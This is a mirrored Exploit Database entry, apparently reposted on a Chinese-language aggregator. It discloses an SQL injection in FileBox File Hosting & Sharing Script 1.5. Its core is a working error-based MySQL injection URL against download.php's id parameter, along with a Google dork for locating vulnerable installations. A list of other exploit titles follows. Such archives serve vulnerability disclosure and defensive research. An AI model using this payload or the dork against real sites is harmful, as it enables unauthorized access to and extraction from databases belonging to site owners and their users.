FileBox File Hosting & Sharing Script 1.5 – SQL Injection

Exploit Database
83 阅读

作者： SubhashDasyam

日期： 2011-08-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17753/

# Exploit Title: FileBox - File Hosting & Sharing Script 1.5 SQL Injection
# Google Dork: inurl:FileBox
# Date: 30/08/2011
# Author: Scripts Apart
# Software Link: http://www.scriptsapart.com
# Version: 1.5
# Tested on: Windows 7 , Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com

There is a SQL Vulnerability in the FileBox Script

http://localhost/download.php?id=%20and(select%201%20from(select%20count(*),concat((select%20(select%200x53514c20417661696c61626c65206279205375626861736844617379616d)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1

The sqli is MYSQL_Error based one

last Exploits
FileBox File Hosting & Sharing Script 1.5 – SQL Injection的更多信息

WordPress Plugin Ninja Forms 3.3.17 – Cross-Site Scripting：
FestOS 2.3c – ‘upload.php’ Arbitrary File Upload：
Element-IT PowUpload 1.3 – Arbitrary File Upload：
Your Articles Directory – Login Option SQL Injection：
Online Project Time Management System 1.0 – Multiple Stored Cross Site Scripting (XSS) (Authenticated)：
Joomla! Component JE Quiz 2.3 – SQL Injection：
Subrion CMS 4.0.5 – Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting：
Western Digital My Cloud 04.01.03-421/04.01.04-422 – Command Injection：